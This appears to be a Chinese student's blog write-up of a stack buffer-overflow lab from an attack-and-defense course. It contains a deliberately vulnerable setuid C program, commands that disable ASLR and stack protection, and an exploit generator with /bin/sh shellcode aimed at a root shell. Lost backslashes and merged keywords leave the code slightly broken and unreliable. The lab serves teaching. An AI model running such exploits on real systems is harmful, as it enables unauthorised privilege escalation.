• 20159315《网络攻防实践》第十一周总结


    20159315《网络攻防实践》第十一周总结#

    缓存溢出实验总结##

    一、实验简介###

    缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段。这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭,溢出会引起返回地址被重写。

    实验过程###

    实验环境为实验楼提供的64位Ubuntu linux虚拟环境,为方便观察汇编语句,需要在32位环境下作操作。
    1、安装一些用于编译32位C程序的东西:

    sudo apt-get update
    sudo apt-get install lib32z1 libc6-dev-i386
    sudo apt-get install lib32readline-gplv2-dev
    

    2、输入命令“linux32”进入32位linux环境。输入“/bin/bash”使用bash。
    3、Ubuntu和其他一些Linux系统中,使用地址空间随机化来随机堆(heap)和栈(stack)的初始地址,这使得猜测准确的内存地址变得十分困难,而猜测内存地址是缓冲区溢出攻击的关键。因此本次实验中,我们使用以下命令关闭这一功能:

    sudo sysctl -w kernel.randomize_va_space=0
    

    4、linux系统中,/bin/sh实际是指向/bin/bash或/bin/dash的一个符号链接。为了重现这一防护措施被实现之前的情形,我们使用另一个shell程序(zsh)代替/bin/bash。下面的指令描述了如何设置zsh程序:

    sudo su
    cd /bin
    rm sh
    ln -s zsh sh
    exit
    

    5、漏洞程序:
    把以下代码保存为“stack.c”文件,保存到 /tmp 目录下。代码如下:

    /* stack.c */
    /* This program has a buffer overflow vulnerability. *//* Our task is to exploit this vulnerability */
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    intbof(char *str)
    {
    char buffer[12];
    
    /* The following statement has a buffer overflow problem */strcpy(buffer, str);
    
    return1;
    }
    
    intmain(int argc, char **argv){
    char str[517];
    FILE *badfile;
    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);
    printf("Returned Properly
    ");
    return1;
    }
    

    通过代码可以知道,程序会读取一个名为“badfile”的文件,并将文件内容装入“buffer”。
    编译该程序,并设置SET-UID。命令如下:

    sudo su
    gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c
    chmod u+s stack
    exit
    

    GCC编译器有一种栈保护机制来阻止缓冲区溢出,所以我们在编译代码时需要用 –fno-stack-protector 关闭这种机制。
    而 -z execstack 用于允许执行栈。

    6、目的是攻击刚才的漏洞程序,并通过攻击获得root权限。
    把以下代码保存为“exploit.c”文件,保存到 /tmp 目录下。代码如下:

    /* exploit.c */
    /* A program that creates a file containing code for launching shell*/
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    char shellcode[]=
    
    "x31xc0"//xorl %eax,%eax
    "x50"//pushl %eax
    "x68""//sh"//pushl $0x68732f2f
    "x68""/bin"//pushl $0x6e69622f
    "x89xe3"//movl %esp,%ebx
    "x50"//pushl %eax
    "x53"//pushl %ebx
    "x89xe1"//movl %esp,%ecx
    "x99"//cdq
    "xb0x0b"//movb $0x0b,%al
    "xcdx80"//int $0x80
    ;
    
    voidmain(int argc, char **argv)
    {
    char buffer[517];
    FILE *badfile;
    
    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);
    
    /* You need to fill the buffer with appropriate contents here */
    strcpy(buffer,"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x??x??x??x??");
    strcpy(buffer+100,shellcode);
    
    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
    }
    

    “x??x??x??x??”处需要添上shellcode保存在内存中的地址,因为发生溢出后这个位置刚好可以覆盖返回地址。
    而 strcpy(buffer+100,shellcode); 这一句又告诉我们,shellcode保存在 buffer+100 的位置。
    现在我们要得到shellcode在内存中的地址,输入命令:

    gdb stack
    disass main
    

    根据语句 strcpy(buffer+100,shellcode); 我们计算shellcode的地址为 0xffffd020(十六进制)+100(十进制)=0xffffd084(十六进制)
    现在修改exploit.c文件!将 x??x??x??x?? 修改为 x84x08xffxff

    然后,编译exploit.c程序:

    gcc -m32 -o exploit exploit.c
    

    参考资料###

    实验楼相关课程

  • 相关阅读:
    python学习笔记6基本对象和流程语句整理
    暑假第二周总结(2018.7.16——7.22)
    暑假第三周总结(2018.7.23——7.29)
    《大道至简》读后感
    暑假第四周总结(2018.7.30——8.5)
    暑假第一周总结(2018.7.97.15)
    .NET中实现页面间的参数传递 QueryString\Application\Session\Cookie(转载)
    px和dip的区别与转换公式
    android开发ListView+Json+异步网络图片加载+滚动翻页的例子(图片能缓存,图片不错乱)
    正则表达式的惰性匹配方法
  • 原文地址:https://www.cnblogs.com/xuzhili00/p/5500086.html
Copyright © 2020-2023  润新知